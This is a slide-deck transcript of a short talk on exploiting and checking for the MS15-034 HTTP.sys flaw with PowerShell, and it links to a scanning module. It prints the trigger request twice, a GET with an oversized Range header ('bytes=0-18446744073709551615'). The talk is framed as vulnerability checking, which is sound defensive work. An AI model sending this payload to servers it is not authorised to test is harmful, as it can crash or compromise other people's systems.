Exploiting MS15-034 In PowerShell

Post on 24-Jan-2017


EXPLOITING MS15-034 IN POWERSHELL

KIERAN JACOBSEN
TECHNICAL LEAD - READIFY

@KJACOBSEN – POSHSECURITY.COM

‘REMOTE CODE EXECUTION’ - IN HTTP.SYS

IF THE BAD GUY CAN EXECUTE CODE ON YOUR BOX, IT ISN’T YOUR BOX ANYMORE.

HTTP.SYS IS EVERYWHERE

IIS KERNEL CACHING MODULE

ARE WE VULNERABLE?

REQUEST -> RESPONSE

GET / HTTP/1.1
HOST: GOOGLE.COM
RANGE: BYTES=0-18446744073709551615
CONNECTION: CLOSE

GET / HTTP/1.1`r`nHOST: GOOGLE.COM`r`nRANGE: BYTES=0-18446744073709551615`r`nCONNECTION: CLOSE`r`n`r`n

STREAMS

WORKING WITH TCP

MS15034.PSM1

MORE INFORMATION

• MY WEBSITE – HTTP://POSHSECURITY.COM
• TWITTER - @KJACOBSEN
• MS15-034 MODULE – HTTP://GITHUB.COM/POSHSECURITY/MS15034
• MICROSOFT SECURITY BULLETIN - HTTPS://TECHNET.MICROSOFT.COM/EN-US/LIBRARY/SECURITY/MS15-034.ASPX